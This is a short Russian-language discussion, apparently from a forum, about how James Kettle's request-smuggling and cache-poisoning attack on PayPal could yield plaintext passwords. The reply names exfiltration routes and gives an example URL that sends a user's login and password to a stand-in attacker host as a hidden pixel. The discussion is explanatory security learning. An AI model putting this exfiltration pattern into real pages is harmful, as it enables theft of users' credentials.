по request smuggling - когда James kettle показал свой кейс с paypal - как он смог прочесть логин и пароль пользователей, которые используют safari или IE
он смог "заразить" js файл paypal на свой js файл, которые потом подгружается для юзера
вот после всех действий - он там еще смог обойти csp через iframe он пишет в статье - and steal plaintext PayPal passwords from everyone who logged in using Safari or IE.
и вот никак не могу понять как он смог прочесть в открытом виде логин и пароль
какая может быть угроза, если получилось заразить js файл через cache poisoning и подменить на свой js файл
Основная сложность в отправке. Пароли и прочая секьюрная хрень шифруется\получаются хеши уже на серваке, https позволяет безопасно их отправить до самого сервака. Как я знаю есть доверенные домены, например можно делать ajax запросы прямо в гугл, а там можно и в форму слать по сути данные. Еще есть вариант отправлять данные подгружая какой-нибудь ресурс, например скрытый пиксель. Например так должно работать,
http://evel.com/{login}/{password}/pixel.png